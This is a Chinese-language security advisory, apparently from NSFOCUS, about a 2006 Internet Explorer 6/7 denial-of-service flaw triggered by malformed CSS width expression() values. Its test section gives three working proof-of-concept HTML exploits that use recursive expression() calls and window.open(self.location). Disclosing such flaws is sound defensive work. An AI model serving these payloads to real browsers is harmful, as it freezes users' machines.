安全研究

安全漏洞
IE CSS畸形宽度单元标记拒绝服务漏洞

发布日期:2006-12-06
更新日期:2006-12-08

受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 7 Beta 2
Microsoft Internet Explorer 7 Beta 1
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ  ID: 21466

Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer在处理畸形的HTML标记时存在漏洞,远程攻击者可能利用此漏洞导致用户机器不可用。

如果用户使用IE访问了设置有特制CSS宽度单元的WEB页面的话,就会导致iexplore.exe耗尽100%的CPU资源。

<*来源:José_Carlos_Nieto_Jarquín (xiam.core@gmail.com
        Andrius Paurys (andrius.paurys@gmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116542162532025&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
    <table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
    <tr><td></td></tr>
    </table>
</div>


Exploit 2
<div style="width: expression(window.open(self.location));">
    &nbsp;
</div>

Exploit 3
<html>
    <head>
        <title>Another non-standards compliant IE D.O.S.</title>
    </head>
    <body>
        <div id="foo" style="height: 20px; border: 1px solid blue">
            <table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');">
            <tr>
                <td>
                    IE makes my life harder :(. It sucks, don't use it :).
                </td>
            </tr>
            </table>
        </div>
        Written by <a href="http://xiam.be">xiam</a>.<br />
        Tested under IE 6.0.2900.2180
    </body>
</html>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3732
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障